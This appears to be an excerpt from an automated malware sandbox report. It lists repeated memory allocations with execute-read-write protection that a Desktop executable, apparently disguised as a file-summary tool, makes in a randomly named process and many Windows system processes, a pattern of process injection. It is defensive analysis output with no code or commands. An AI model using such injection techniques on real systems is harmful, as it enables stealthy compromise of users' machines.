        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2090000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2F50000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2A20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2A30000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2570000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2580000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 12D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 1320000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 28A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 28B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 1160000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 1170000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 9D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 9E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: AB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: AC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2210000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2220000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: F80000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: F90000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2700000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2750000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 10B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 10C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: FA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: FB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: F20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: F70000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: D40000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: D50000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 1350000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 13A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 7B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 7C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: B10000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: F20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: 1A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\dwm.exe base: 670000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\sihost.exe base: D30000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: 400000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: 8E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: 800000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\explorer.exe base: 82C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: A40000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 630000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: 170000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: A90000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 990000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 8A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: F80000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 1B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 9B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: AB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\conhost.exe base: 5A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\conhost.exe base: 580000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\backgroundTaskHost.exe base: BD0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: BF0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: B20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\dllhost.exe base: CE0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: B70000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: F60000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: F30000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: 1B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\dwm.exe base: 680000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\sihost.exe base: D40000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: 410000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: 8F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: 810000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\explorer.exe base: AE40000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: 300000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: A50000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 640000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: 180000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: AA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 9A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 8B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: F90000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 1C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 9C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: AC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\conhost.exe base: 5B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\conhost.exe base: 590000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\backgroundTaskHost.exe base: BE0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: C00000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: B30000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\dllhost.exe base: CF0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: B80000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: F70000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: F40000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: 1C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\dwm.exe base: 690000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\sihost.exe base: D50000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: 420000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: 900000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: 820000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\explorer.exe base: B170000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: 310000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: A60000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 650000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: 190000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: AB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 9B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 8C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: FA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 1D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 9D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: AD0000 protect: page execute and read and writeJump to behavior
